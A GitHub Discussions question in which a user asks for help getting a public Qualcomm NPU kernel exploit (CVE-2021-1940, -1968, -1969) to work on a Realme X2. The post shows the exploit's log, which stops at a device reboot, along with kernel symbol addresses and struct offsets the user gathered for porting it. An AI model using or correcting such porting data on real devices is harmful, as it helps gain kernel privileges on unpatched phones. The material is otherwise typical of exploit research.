Exploit for Qualcomm NPU bugs (CVE-2021-1940, CVE-2021-1968, CVE-2021-1969) #806
Unanswered
bitbounty85
asked this question in
Q&A
Replies: 1 comment
-
402 |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
I am trying the npu exploit "https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Qualcomm/NPU" on realmeX2 device, the device specifications is given below.
Device Specifications:
Model: RMX1992
Processor: Qualcomm SDM730G AIE Octa-core
Storage: 4Gb ram, 64 Gb internal storage
Android_version: 10
Android_security_patch_level: 5 May 2021
kernel_version: 4.14.117
build_no: RMX1992EX_11_C.18
firmware: RMX1992EX_11_OTA_1180_all_4MQxOL7lVVxp.ozip
The phone is rebooting, the log is given below.
[+] host_irq_wq offset: ffffffc3ee54d418
RMX1992L1:/data/local/tmp $ [+] network_stats_buf (controlled data) address: 0xffffffc38f9e4000
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 4 reallocation threads ready!
[+] trigger uaf
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 8 reallocation threads ready!
<phone_reboots_here>
I extracted the kernel.elf from firmware and found the addresses
and substracted 0x80000 to get the below offsets.
#define BPF_PROG_RUN32 0xFFFFFF8008146068
#define INIT_TASK 0xFFFFFF8009D9CC00
#define HOST_IRQ_WQ 0xFFFFFF80089F9DF8
#define ION_DMA_BUF_VUNMAP 0xFFFFFF8008BDF5D0
#define BPF_CALL_BASE 0xFFFFFF8008144770
#define SELINUX_ENFORCING 0xFFFFFF800A4A1000
#define DO_TASK_DEAD 0xFFFFFF800806D580
#define MEMSET 0xFFFFFF80090A7200
#define MEMCMP 0xFFFFFF80090A6D04
#define ARGV_SPLIT 0xFFFFFF80090A78E8
#define CALL_USERMODEHELPER 0xFFFFFF8008050280
#define RUN_CMD_ENVP 0xFFFFFF8009DAE370
#define ION_ALLOC_FD 0xFFFFFF8008BDDDB0
//offsets to dma_buf and ion_buffer
#define PRIV_OFF 168
#define HEAP_OFF 32
#define OPS_OFF 56
#define MAP_OFF 16
#define UNMAP_OFF 24
#define CNT_OFF 136
from vmlinux i got the above offsets and the structures from
which i got these offsets are mentioned below.
struct dma_buf{
...
void* priv; //PRIV_OFF
...
}
struct ion_buffer{
...
struct ion_heap* heap; //HEAP_oFF
...
int kmap_cnt; //CNT_OFF
...
}
struct ion_heap{
...
struct ion_heap_ops* ops; //OPS_OFF
...
}
struct ion_heap_ops{
...
void* (*map_kernel)(struct ion_heap *, struct ion_buffer *); //MAP_OFF
void (*unmap_kernel)(struct ion_heap *, struct ion_buffer *); //UNMAP_OFF
...
}
can u please help me @m-y-myo
Beta Was this translation helpful? Give feedback.
All reactions